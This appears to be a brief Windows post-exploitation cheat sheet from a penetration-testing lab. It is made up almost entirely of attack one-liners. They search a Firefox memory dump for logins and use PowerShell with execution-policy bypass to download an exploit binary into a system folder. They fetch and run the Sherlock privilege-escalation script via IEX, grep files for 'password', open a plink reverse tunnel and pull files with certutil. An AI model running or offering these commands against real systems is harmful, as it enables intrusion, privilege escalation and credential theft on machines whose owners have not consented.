Searching
Get-ChildItem -Path "C:\Users\Chase\Desktop\2104firefox.dmp" -Recurse -File | Select-String login
Download
powershell.exe -exec bypass -command "Invoke-WebRequest 'http://10.10.14.18:8888/41020.exe' -OutFile 'C:\windows\system32\spool\drivers\color\41020.exe'"
Execution
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.18:8888/Sherlock.ps1'); Find-AllVulns -Command 'start powershell.exe'"
Recurse List the access file
gci -recurse –include *.* | select Fullname
Search file
dir abc.txt /s /p
findstr /i /s "password" *.*
#Answer the promot message with "y"
cmd.exe /c echo y | plink.exe -ssh –l username –pw password –R
download a file
certutil.exe - urlcache -split -f http://ip/file file